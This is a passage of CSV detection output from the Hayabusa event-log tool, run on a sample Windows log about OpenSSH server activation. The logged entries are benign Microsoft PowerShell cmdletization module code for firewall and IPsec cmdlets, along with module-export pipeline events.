'*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.661 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.661 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.662 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.662 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.662 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.663 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.663 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.664 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' -Alias '*' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' -Alias '*' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 